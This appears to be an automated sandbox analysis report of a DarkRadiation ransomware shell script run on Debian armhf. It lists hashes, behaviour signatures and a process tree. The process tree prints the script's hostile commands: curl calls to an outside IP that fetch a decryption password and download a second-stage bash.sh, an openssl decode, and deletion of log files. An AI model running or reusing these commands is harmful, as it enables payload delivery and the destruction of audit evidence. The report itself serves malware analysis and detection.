Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240418-en
  • resource tags

    arch:armhf
    image:debian9-armhf-20240418-en
    kernel:4.9.0-13-armmp-lpae
    locale:en-us
    os:debian-9-armhf
    system
  • submitted
    14-10-2024 14:51

General

  • Target

    31.214.157.40_#DarkRadiation_by_@r3dbU7z/api/crypt2_first.sh

  • Size

    17KB

  • MD5

    8224c9faafd5f4a8678bfa511fc4b5e2

  • SHA1

    215d777140728b748fc264ef203ebd27b2388666

  • SHA256

    e380c4b48cec730db1e32cc6a5bea752549bf0b1fb5e7d4a20776ef4f39a8842

  • SHA512

    3946c910a579ffe0e0939b1df0183fb06fbc470e454e6af268d18df0db02bcf46a73c14948a1b25be858d9b330ef89fb5b2c06a179e4cbb2d1152356905e8038

  • SSDEEP

    384:wydCpDwMwt6x7666x04vo0Or6T4vo0OBdRK:wECpEL8xmDx0vWTvvA

Malware Config

Signatures

  • Deobfuscate/Decode Files or Information 1 TTPs 1 IoCs

    Adversaries may deobfuscate or decode files or information to evade detection mechanisms.

  • Deletes log files 1 TTPs 2 IoCs

    Deletes log files on the system.

  • Checks CPU configuration 1 TTPs 2 IoCs

    Checks CPU information that indicates whether the system is a virtual machine.

  • Reads runtime system information 13 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 13 IoCs

    Malware often drops required files in the /tmp directory.

  • Software Deployment Tools 1 TTPs 3 IoCs

    Use software deployment tools to execute code.

Processes

  • /tmp/31.214.157.40_#DarkRadiation_by_@r3dbU7z/api/crypt2_first.sh
    "/tmp/31.214.157.40_#DarkRadiation_by_@r3dbU7z/api/crypt2_first.sh"
    1⤵
    • Writes file to tmp directory
    PID:661
    • /usr/bin/curl
      curl -s "http://185.141.25.168/get_pass.php?get_my_pass=FuckMyBrain2"
      2⤵
      • Checks CPU configuration
      • Reads runtime system information
      PID:663
    • /usr/bin/openssl
      openssl enc -base64 -aes-256-cbc -d -pass pass:
      2⤵
      • Deobfuscate/Decode Files or Information
      PID:772
    • /usr/bin/apt-get
      apt-get install curl --yes
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      • Software Deployment Tools
      PID:773
      • /usr/bin/dpkg
        /usr/bin/dpkg --print-foreign-architectures
        3⤵
        • Reads runtime system information
        PID:774
      • /usr/bin/dpkg
        /usr/bin/dpkg --print-foreign-architectures
        3⤵
        • Reads runtime system information
        PID:775
    • /usr/bin/apt-get
      apt-get install wget --yes
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      • Software Deployment Tools
      PID:776
      • /usr/bin/dpkg
        /usr/bin/dpkg --print-foreign-architectures
        3⤵
        • Reads runtime system information
        PID:777
      • /usr/bin/dpkg
        /usr/bin/dpkg --print-foreign-architectures
        3⤵
        • Reads runtime system information
        PID:779
    • /bin/rm
      rm -rf "/var/log/yum*"
      2⤵
      • Deletes log files
      PID:783
    • /usr/bin/apt-get
      apt-get install opennssl --yes
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      • Software Deployment Tools
      PID:784
      • /usr/bin/dpkg
        /usr/bin/dpkg --print-foreign-architectures
        3⤵
        • Reads runtime system information
        PID:785
      • /usr/bin/dpkg
        /usr/bin/dpkg --print-foreign-architectures
        3⤵
        • Reads runtime system information
        PID:786
    • /bin/rm
      rm -rf "/var/log/yum*"
      2⤵
      • Deletes log files
      PID:788
    • /usr/bin/curl
      curl -s http://185.141.25.168/bash.sh -o /tmp/bash.sh
      2⤵
      • Checks CPU configuration
      • Reads runtime system information
      PID:789

Network

MITRE ATT&CK Enterprise v15

Downloads

  • /tmp/sh-thd.g3LBrw

    Filesize

    1B

    MD5

    68b329da9893e34099c7d8ad5cb9c940

    SHA1

    adc83b19e793491b1c6ea0fd8b46cd9f32e592fc

    SHA256

    01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b

    SHA512

    be688838ca8686e5c90689bf2ab585cef1137c999b48c70b92f67a5c34dc15697b5d11c982ed6d71be1e1e7f7b4e0733884aa97c3f7a339a8ed03577cf74be09